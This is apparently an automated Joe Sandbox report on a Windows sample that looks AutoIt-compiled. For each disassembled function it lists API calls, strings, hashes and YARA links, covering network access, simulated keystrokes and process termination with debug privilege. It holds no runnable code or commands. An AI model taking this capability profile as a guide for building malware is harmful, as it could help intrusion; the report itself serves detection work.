                                                      • Instruction ID: b909ccfb2b0f2d377be44a55faf5a8e2237afe637f5ca0df775eb2ed393266ea
                                                      • Opcode Fuzzy Hash: 474e4cba0b8c8ad8af19b3f37a6a0e2229beceaeaaed10d791e5f33088d7250f
                                                      • Instruction Fuzzy Hash: A7314CB1A00608AFEB219F65CC88EAB7BFCEB49754B14851EF446D2211DB34DD04ABE1
                                                      Function 00F8989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F63AAF,?,?,Bad directive syntax error,00FBCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F898BC
                                                      • LoadStringW.USER32(00000000,?,00F63AAF,?), ref: 00F898C3
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F89987
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 858772685-4153970271
                                                      • Opcode ID: c76b5af8ce820963091ef0d2004bc73876c3837c84e7c0a73d89b6612234ec71
                                                      • Instruction ID: f20c5a6a8b8f221fda018bd9d53fb85de57911f79d210348a9e9d67c94387333
                                                      • Opcode Fuzzy Hash: c76b5af8ce820963091ef0d2004bc73876c3837c84e7c0a73d89b6612234ec71
                                                      • Instruction Fuzzy Hash: 62218271C0421EABCF15EF90DC06EEE7735BF18300F084425F515620A1DB799A18FB51
                                                      Function 00F8209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 00F820AB
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00F820C0
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F8214D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1290815626-3381328864
                                                      • Opcode ID: 92cac54bc33e6e7794e70d2530d41a3ad1e09a3855c2fa0200eb38dabbf68a1c
                                                      • Instruction ID: eeb32902aad82d23f0b024aacab04e82c2011b93c5e4171ccda90469cee56537
                                                      • Opcode Fuzzy Hash: 92cac54bc33e6e7794e70d2530d41a3ad1e09a3855c2fa0200eb38dabbf68a1c
                                                      • Instruction Fuzzy Hash: EB11C677A88B06BAF6017621DC0AEE7379DDB05728B300116FB04B51E2FEA9B8417B55
                                                      Function 00F5CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 1282221369-0
                                                      • Opcode ID: 821ab511e0141f7ab26aeac7b9aafeadb4abaf10e901ad5e4fea3876c0546a32
                                                      • Instruction ID: b39d2d5da4669a2f9aaa6c84cc84d6d9fe85b83ad4179b08f538bec2b77f61d4
                                                      • Opcode Fuzzy Hash: 821ab511e0141f7ab26aeac7b9aafeadb4abaf10e901ad5e4fea3876c0546a32
                                                      • Instruction Fuzzy Hash: 10610771D043046FDB21AFB49C81A6D7BE9AF05722F04416DEF46A7282DB359909F7E0
                                                      Function 00F38B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F76890
                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F768A9
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F768B9
                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F768D1
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F768F2
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F38874,00000000,00000000,00000000,000000FF,00000000), ref: 00F76901
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F7691E
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F38874,00000000,00000000,00000000,000000FF,00000000), ref: 00F7692D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID:
                                                      • API String ID: 1268354404-0
                                                      • Opcode ID: 3ee2c240a45b128e0fc3cf34599b790121c322bbc6cee6c3b0688e72832b8193
                                                      • Instruction ID: fc6da4cfdcc503eeddfd9e4d07df48459e5c54ac2f097f14ce8090c86a21dede
                                                      • Opcode Fuzzy Hash: 3ee2c240a45b128e0fc3cf34599b790121c322bbc6cee6c3b0688e72832b8193
                                                      • Instruction Fuzzy Hash: D2514970A0070AEFDB20CF24CC95BAA7BB5FF88760F104519F956D72A0DBB4A951EB50
                                                      Function 00F9C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F9C182
                                                      • GetLastError.KERNEL32 ref: 00F9C195
                                                      • SetEvent.KERNEL32(?), ref: 00F9C1A9
                                                        • Part of subcall function 00F9C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F9C272
                                                        • Part of subcall function 00F9C253: GetLastError.KERNEL32 ref: 00F9C322
                                                        • Part of subcall function 00F9C253: SetEvent.KERNEL32(?), ref: 00F9C336
                                                        • Part of subcall function 00F9C253: InternetCloseHandle.WININET(00000000), ref: 00F9C341
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 337547030-0
                                                      • Opcode ID: d5d15a552be159f61c1c576f547fc89ca5be01836d9e4db821811584e4614891
                                                      • Instruction ID: 755bc1d026c23d75402b7941ca4ee92a92dac365d2370d96863f3c55b8109173
                                                      • Opcode Fuzzy Hash: d5d15a552be159f61c1c576f547fc89ca5be01836d9e4db821811584e4614891
                                                      • Instruction Fuzzy Hash: 5F318A71600605AFEF219FA5DC84A67BBF8FF58310B14452EF95A82610DB31E814BFE0
                                                      Function 00F825A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F83A57
                                                        • Part of subcall function 00F83A3D: GetCurrentThreadId.KERNEL32 ref: 00F83A5E
                                                        • Part of subcall function 00F83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F825B3), ref: 00F83A65
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F825BD
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F825DB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F825DF
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F825E9
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F82601
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F82605
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F8260F
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F82623
                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F82627
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: baf8414372323f79f790fa94ec4a46e9327591d580bb0b4704103f0a4a27800f
                                                      • Instruction ID: c2f75f6b613e7c624d78c59c3895aa4adf30277813f89553cc0149e216a5cf66
                                                      • Opcode Fuzzy Hash: baf8414372323f79f790fa94ec4a46e9327591d580bb0b4704103f0a4a27800f
                                                      • Instruction Fuzzy Hash: A201D471390214BBFB107769DCCAF9A3F59DB4EB12F100102F358AE0E1C9F22444AEA9
                                                      Function 00F81803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F81449,?,?,00000000), ref: 00F8180C
                                                      • HeapAlloc.KERNEL32(00000000,?,00F81449,?,?,00000000), ref: 00F81813
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F81449,?,?,00000000), ref: 00F81828
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00F81449,?,?,00000000), ref: 00F81830
                                                      • DuplicateHandle.KERNEL32(00000000,?,00F81449,?,?,00000000), ref: 00F81833
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F81449,?,?,00000000), ref: 00F81843
                                                      • GetCurrentProcess.KERNEL32(00F81449,00000000,?,00F81449,?,?,00000000), ref: 00F8184B
                                                      • DuplicateHandle.KERNEL32(00000000,?,00F81449,?,?,00000000), ref: 00F8184E
                                                      • CreateThread.KERNEL32(00000000,00000000,00F81874,00000000,00000000,00000000), ref: 00F81868
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 6b8c99c04229e3c07d52a98bb33fbee155af4d09c42a686afecdfe838354ab4c
                                                      • Instruction ID: 45e7114bd2608c5827225d1329246737913b7d2a4e5e6b468471a61cf61c50dd
                                                      • Opcode Fuzzy Hash: 6b8c99c04229e3c07d52a98bb33fbee155af4d09c42a686afecdfe838354ab4c
                                                      • Instruction Fuzzy Hash: F301BFB5240308BFE710AFA5DC8DF573BACEB89B11F404511FA05EB192C6709800DF60
                                                      Function 00FAA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00F8D501
                                                        • Part of subcall function 00F8D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00F8D50F
                                                        • Part of subcall function 00F8D4DC: CloseHandle.KERNEL32(00000000), ref: 00F8D5DC
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FAA16D
                                                      • GetLastError.KERNEL32 ref: 00FAA180
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FAA1B3
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FAA268
                                                      • GetLastError.KERNEL32(00000000), ref: 00FAA273
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAA2C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: 1d3db64876fa77da8fc892fff7c37bca269f124eeac13808c887aab8e52b2705
                                                      • Instruction ID: a09132c275764b9821351af7929c41899ce6c6d4fe295a7b52ecfd02c710da7d
                                                      • Opcode Fuzzy Hash: 1d3db64876fa77da8fc892fff7c37bca269f124eeac13808c887aab8e52b2705
                                                      • Instruction Fuzzy Hash: 65617F71604242AFD720DF14C894F1ABBE5AF45318F14849CE4668FBA3C776EC49DB92
                                                      Function 00FB3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FB3925
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FB393A
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FB3954
                                                      • _wcslen.LIBCMT ref: 00FB3999
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FB39C6
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FB39F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcslen
                                                      • String ID: SysListView32
                                                      • API String ID: 2147712094-78025650
                                                      • Opcode ID: 34a653c8c79c2f28b7820c62b08fb2efb65e458a8d2d77b0ca3e60fed6f95e82
                                                      • Instruction ID: 437fd0412b4791c5e131ccd30f69569ff6bfc202c38e6e13e4657bf8d0d31d0d
                                                      • Opcode Fuzzy Hash: 34a653c8c79c2f28b7820c62b08fb2efb65e458a8d2d77b0ca3e60fed6f95e82
                                                      • Instruction Fuzzy Hash: 0941B271A40218ABEB219F65CC45FEA7BA9EF08360F100126F958E7281D7B5D980EF90
                                                      Function 00F8BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F8BCFD
                                                      • IsMenu.USER32(00000000), ref: 00F8BD1D
                                                      • CreatePopupMenu.USER32 ref: 00F8BD53
                                                      • GetMenuItemCount.USER32(012055A8), ref: 00F8BDA4
                                                      • InsertMenuItemW.USER32(012055A8,?,00000001,00000030), ref: 00F8BDCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: 524803369a68fad285934faabae98a8be52d8a5f9e4cfc7d1644e67fab4add1e
                                                      • Instruction ID: ebf5db49cad27a97549dcfdda077cc0de8db218175515fc9eedff648e632839e
                                                      • Opcode Fuzzy Hash: 524803369a68fad285934faabae98a8be52d8a5f9e4cfc7d1644e67fab4add1e
                                                      • Instruction Fuzzy Hash: 8451AF72A00209EBDF20EFA8D8C8BEEBBF4AF45324F144219E851D7291D7749945EB61
                                                      Function 00F8C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00F8C913
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: f12378fc7fc0f0c28395068fcbc5a5c47b1c46d829d3b93c4f02e528fcf961e2
                                                      • Instruction ID: 2feac820c8119ddcb21b39f749835c5b6bf7cf396ff3ddc7d52c3b4108027bb6
                                                      • Opcode Fuzzy Hash: f12378fc7fc0f0c28395068fcbc5a5c47b1c46d829d3b93c4f02e528fcf961e2
                                                      • Instruction Fuzzy Hash: 0511EE32A8970ABAA7017B559C82DDB7B9CDF15764B20006BF500E5281EB7CAD4073F5
                                                      Function 00F8ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$LocalTime
                                                      • String ID:
                                                      • API String ID: 952045576-0
                                                      • Opcode ID: 329dafba768fca8827cd548d63c70f58793aa26515f8d4ee8c23e18081fdff54
                                                      • Instruction ID: e11495c1d3762ed278cee45ae440af9e114dce5a2bae35e7069d14e107ad6a84
                                                      • Opcode Fuzzy Hash: 329dafba768fca8827cd548d63c70f58793aa26515f8d4ee8c23e18081fdff54
                                                      • Instruction Fuzzy Hash: 36418566C1011875CB11FBF48C8AACFBBA8AF45710F508566E914F3121FB78E355E3A6
                                                      Function 00F3F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00F3F953
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00F7F3D1
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F7682C,00000004,00000000,00000000), ref: 00F7F454
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: c404d9ae1f345ed0b069795f18e71e8848ff42cbb978ed049bfdc34781f5a6ff
                                                      • Instruction ID: 1a6760cce092a92128ace31e50255311d5d80ec2eda07786f5ec0f270d3c70fb
                                                      • Opcode Fuzzy Hash: c404d9ae1f345ed0b069795f18e71e8848ff42cbb978ed049bfdc34781f5a6ff
                                                      • Instruction Fuzzy Hash: 75412931E09640BBC7389B29CCC876B7B92BF56330F14813DE08B56660C672A888FB51
                                                      Function 00FB2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FB2D1B
                                                      • GetDC.USER32(00000000), ref: 00FB2D23
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FB2D2E
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FB2D3A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FB2D76
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FB2D87
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FB5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00FB2DC2
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FB2DE1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 1bae4597dd4ae8c5528974e19327261af84e3ed49cc63cb8b09127e2a580be1a
                                                      • Instruction ID: 55eed22eddcd5baf618ab3c0e3b4c8d2a6efe70f6370befc4d730587950a08ae
